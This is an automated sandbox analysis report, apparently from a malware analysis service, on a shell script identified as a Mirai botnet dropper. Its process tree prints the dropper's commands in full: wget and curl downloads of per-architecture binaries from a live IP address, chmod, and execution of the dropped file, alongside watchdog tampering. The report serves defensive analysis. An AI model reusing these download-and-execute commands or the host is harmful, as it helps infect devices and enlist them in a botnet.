Analysis
-
max time kernel
139s -
max time network
149s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
28-12-2024 02:34
Static task
static1
Behavioral task
behavioral1
Sample
86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3.sh
-
Size
2KB
-
MD5
e182ba2d64359a90a25281b53cdd0b14
-
SHA1
d8450d776b48b8834a1c607402eebf97bc0a126b
-
SHA256
86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3
-
SHA512
71e3f17025d636f8ccbd469bfc6ddeb7ea14bd71a952ad83058c3fb04141039688f6e178d7f3944627aedd1e7ea2c4924d7b452d9e4db192827bf3339624321d
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1543 chmod 1635 chmod 1533 chmod 1595 chmod 1625 chmod 1553 chmod 1585 chmod 1605 chmod 1615 chmod 1575 chmod 1645 chmod 1507 chmod 1513 chmod 1523 chmod 1565 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/Space 1508 Space /tmp/Space 1514 Space /tmp/Space 1524 Space /tmp/Space 1534 Space /tmp/Space 1544 Space /tmp/Space 1554 Space /tmp/Space 1566 Space /tmp/Space 1576 Space /tmp/Space 1586 Space /tmp/Space 1596 Space /tmp/Space 1606 Space /tmp/Space 1616 Space /tmp/Space 1626 Space /tmp/Space 1636 Space /tmp/Space 1646 Space -
Modifies Watchdog functionality 1 TTPs 28 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 28 IoCs
description ioc Process File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space -
resource yara_rule behavioral1/files/fstream-5.dat upx -
description ioc Process File opened for reading /proc/1151/status Space File opened for reading /proc/952/status Space File opened for reading /proc/23/status Space File opened for reading /proc/32/status Space File opened for reading /proc/4/status Space File opened for reading /proc/1497/status Space File opened for reading /proc/1315/status Space File opened for reading /proc/1302/status Space File opened for reading /proc/458/status Space File opened for reading /proc/1527/status Space File opened for reading /proc/1254/status Space File opened for reading /proc/19/status Space File opened for reading /proc/164/status Space File opened for reading /proc/5/status Space File opened for reading /proc/1529/status Space File opened for reading /proc/98/status Space File opened for reading /proc/13/status Space File opened for reading /proc/1586/status Space File opened for reading /proc/175/status Space File opened for reading /proc/1144/status Space File opened for reading /proc/1163/status Space File opened for reading /proc/205/status Space File opened for reading /proc/163/status Space File opened for reading /proc/1502/status Space File opened for reading /proc/34/status Space File opened for reading /proc/1494/status Space File opened for reading /proc/20/status Space File opened for reading /proc/177/status Space File opened for reading /proc/9/status Space File opened for reading /proc/1066/status Space File opened for reading /proc/168/status Space File opened for reading /proc/1286/status Space File opened for reading /proc/524/status Space File opened for reading /proc/18/status Space File opened for reading /proc/175/status Space File opened for reading /proc/1084/status Space File opened for reading /proc/83/status Space File opened for reading /proc/663/status Space File opened for reading /proc/663/status Space File opened for reading /proc/180/status Space File opened for reading /proc/1557/status Space File opened for reading /proc/1537/status Space File opened for reading /proc/1/status Space File opened for reading /proc/1141/status Space File opened for reading /proc/2/status Space File opened for reading /proc/1093/status Space File opened for reading /proc/1561/status Space File opened for reading /proc/1496/status Space File opened for reading /proc/963/status Space File opened for reading /proc/7/status Space File opened for reading /proc/943/status Space File opened for reading /proc/1084/status Space File opened for reading /proc/164/status Space File opened for reading /proc/1549/status Space File opened for reading /proc/1557/status Space File opened for reading /proc/1164/status Space File opened for reading /proc/413/status Space File opened for reading /proc/20/status Space File opened for reading /proc/1060/status Space File opened for reading /proc/1599/status Space File opened for reading /proc/1537/status Space File opened for reading /proc/1148/status Space File opened for reading /proc/1254/status Space File opened for reading /proc/1066/status Space -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1540 wget 1541 curl 1550 wget 1551 curl -
Writes file to tmp directory 30 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Space.arc curl File opened for modification /tmp/Space.mpsl wget File opened for modification /tmp/Space.arm curl File opened for modification /tmp/Space 86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3.sh File opened for modification /tmp/Space.x86_64 curl File opened for modification /tmp/Space.arm5 wget File opened for modification /tmp/Space.sh4 wget File opened for modification /tmp/Space.arc wget File opened for modification /tmp/Space.mips wget File opened for modification /tmp/Space.mips curl File opened for modification /tmp/Space.arm6 wget File opened for modification /tmp/Space.arm6 curl File opened for modification /tmp/Space.ppc wget File opened for modification /tmp/Space.ppc curl File opened for modification /tmp/Space.m68k wget File opened for modification /tmp/Space.i686 curl File opened for modification /tmp/Space.arm7 wget File opened for modification /tmp/Space.arm7 curl File opened for modification /tmp/Space.m68k curl File opened for modification /tmp/Space.sh4 curl File opened for modification /tmp/Space.x86 curl File opened for modification /tmp/Space.x86_64 wget File opened for modification /tmp/Space.i686 wget File opened for modification /tmp/Space.mpsl curl File opened for modification /tmp/Space.arm wget File opened for modification /tmp/Space.arm5 curl File opened for modification /tmp/Space.x86 wget File opened for modification /tmp/Space.mips64 curl File opened for modification /tmp/busybox cp File opened for modification /tmp/Space.sparc curl
Processes
-
/tmp/86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3.sh/tmp/86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3.sh1⤵
- Writes file to tmp directory
PID:1499 -
/bin/cpcp /bin/busybox /tmp/2⤵
- Writes file to tmp directory
PID:1500
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.arc2⤵
- Writes file to tmp directory
PID:1501
-
-
/usr/bin/curlcurl -O http://159.100.18.129/hiddenbin/Space.arc2⤵
- Writes file to tmp directory
PID:1505
-
-
/bin/catcat Space.arc2⤵PID:1506
-
-
/bin/chmodchmod +x 86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-MA2WE02⤵
- File and Directory Permissions Modification
PID:1507
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:1508
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.x862⤵
- Writes file to tmp directory
PID:1510
-
-
/usr/bin/curlcurl -O http://159.100.18.129/hiddenbin/Space.x862⤵
- Writes file to tmp directory
PID:1511
-
-
/bin/catcat Space.x862⤵PID:1512
-
-
/bin/chmodchmod +x 86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.x86 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-MA2WE02⤵
- File and Directory Permissions Modification
PID:1513
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1514
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.x86_642⤵
- Writes file to tmp directory
PID:1520
-
-
/usr/bin/curlcurl -O http://159.100.18.129/hiddenbin/Space.x86_642⤵
- Writes file to tmp directory
PID:1521
-
-
/bin/chmodchmod +x 86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-MA2WE02⤵
- File and Directory Permissions Modification
PID:1523
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1524
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.i6862⤵
- Writes file to tmp directory
PID:1530
-
-
/usr/bin/curlcurl -O http://159.100.18.129/hiddenbin/Space.i6862⤵
- Writes file to tmp directory
PID:1531
-
-
/bin/chmodchmod +x 86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.i686 Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-MA2WE02⤵
- File and Directory Permissions Modification
PID:1533
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1534
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1540
-
-
/usr/bin/curlcurl -O http://159.100.18.129/hiddenbin/Space.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1541
-
-
/bin/chmodchmod +x 86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.i686 Space.mips Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-MA2WE02⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1544
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.mips642⤵
- System Network Configuration Discovery
PID:1550
-
-
/usr/bin/curlcurl -O http://159.100.18.129/hiddenbin/Space.mips642⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1551
-
-
/bin/chmodchmod +x 86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.i686 Space.mips Space.mips64 Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X7 systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-timedated.service-MA2WE02⤵
- File and Directory Permissions Modification
PID:1553
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1554
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.mpsl2⤵
- Writes file to tmp directory
PID:1562
-
-
/usr/bin/curlcurl -O http://159.100.18.129/hiddenbin/Space.mpsl2⤵
- Writes file to tmp directory
PID:1563
-
-
/bin/chmodchmod +x 86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X72⤵
- File and Directory Permissions Modification
PID:1565
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1566
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.arm2⤵
- Writes file to tmp directory
PID:1572
-
-
/usr/bin/curlcurl -O http://159.100.18.129/hiddenbin/Space.arm2⤵
- Writes file to tmp directory
PID:1573
-
-
/bin/chmodchmod +x 86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.arm Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X72⤵
- File and Directory Permissions Modification
PID:1575
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1576
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.arm52⤵
- Writes file to tmp directory
PID:1582
-
-
/usr/bin/curlcurl -O http://159.100.18.129/hiddenbin/Space.arm52⤵
- Writes file to tmp directory
PID:1583
-
-
/bin/chmodchmod +x 86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X72⤵
- File and Directory Permissions Modification
PID:1585
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1586
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.arm62⤵
- Writes file to tmp directory
PID:1592
-
-
/usr/bin/curlcurl -O http://159.100.18.129/hiddenbin/Space.arm62⤵
- Writes file to tmp directory
PID:1593
-
-
/bin/chmodchmod +x 86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X72⤵
- File and Directory Permissions Modification
PID:1595
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1596
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.arm72⤵
- Writes file to tmp directory
PID:1602
-
-
/usr/bin/curlcurl -O http://159.100.18.129/hiddenbin/Space.arm72⤵
- Writes file to tmp directory
PID:1603
-
-
/bin/chmodchmod +x 86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X72⤵
- File and Directory Permissions Modification
PID:1605
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1606
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.ppc2⤵
- Writes file to tmp directory
PID:1612
-
-
/usr/bin/curlcurl -O http://159.100.18.129/hiddenbin/Space.ppc2⤵
- Writes file to tmp directory
PID:1613
-
-
/bin/chmodchmod +x 86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.ppc Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X72⤵
- File and Directory Permissions Modification
PID:1615
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1616
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.sparc2⤵PID:1622
-
-
/usr/bin/curlcurl -O http://159.100.18.129/hiddenbin/Space.sparc2⤵
- Writes file to tmp directory
PID:1623
-
-
/bin/chmodchmod +x 86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.ppc Space.sparc Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X72⤵
- File and Directory Permissions Modification
PID:1625
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1626
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.m68k2⤵
- Writes file to tmp directory
PID:1632
-
-
/usr/bin/curlcurl -O http://159.100.18.129/hiddenbin/Space.m68k2⤵
- Writes file to tmp directory
PID:1633
-
-
/bin/chmodchmod +x 86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.m68k Space.mips Space.mips64 Space.mpsl Space.ppc Space.sparc Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X72⤵
- File and Directory Permissions Modification
PID:1635
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1636
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.sh42⤵
- Writes file to tmp directory
PID:1642
-
-
/usr/bin/curlcurl -O http://159.100.18.129/hiddenbin/Space.sh42⤵
- Writes file to tmp directory
PID:1643
-
-
/bin/chmodchmod +x 86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3.sh busybox config-err-Y1Vltx netplan_rar_235w snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.m68k Space.mips Space.mips64 Space.mpsl Space.ppc Space.sh4 Space.sparc Space.x86 Space.x86_64 ssh-ZUhLdJIiSEMT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-bolt.service-pIDfwt systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-colord.service-vGj0yy systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-ModemManager.service-9BUKBT systemd-private-7de4bcf253d6447d9bc5fb2a419ba7dc-systemd-resolved.service-XWC5X72⤵
- File and Directory Permissions Modification
PID:1645
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1646
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
37KB
MD586b0dbac78477aca5c3dd080ba53e837
SHA12542925378bca24e31bfcbfb9197cb0ba874fb21
SHA25643a4a0183be4f67dc7757fd2068e7c3a604423abe3b5e71ad03b9f382a70899f
SHA5126189287779a998d158de62b5b434338f7cfb556b92dc11280f0bbb6bedc267864c6b48085c80109169204f1d27b12abb5a268fa58da57b2d6200eb4d6eb25758
-
Filesize
113KB
MD5cafba952355d27a129910f5e4f3f99ce
SHA161baaf26de5da12a2941ec73ae7bd8fd8f37f704
SHA2562fcfb888bc32cadee51779121fe4de505b22668a6a05ad3d50780fa2b3774d37
SHA51286b847fe57dd5c4dab277b5f966c1b46899c86c0e4c6a2a1b50838d3b2d47ad79c9944c96c85b2b4f1e68bcba02fd4890aa3452a7cc80778876ede679b3ea730
-
Filesize
2.0MB
MD5b4dede5fc0b1bad5cb8e901bde126b97
SHA110cbe9a418ad84a1ed297948539d37aeb58dd810
SHA256a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020
SHA51245665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6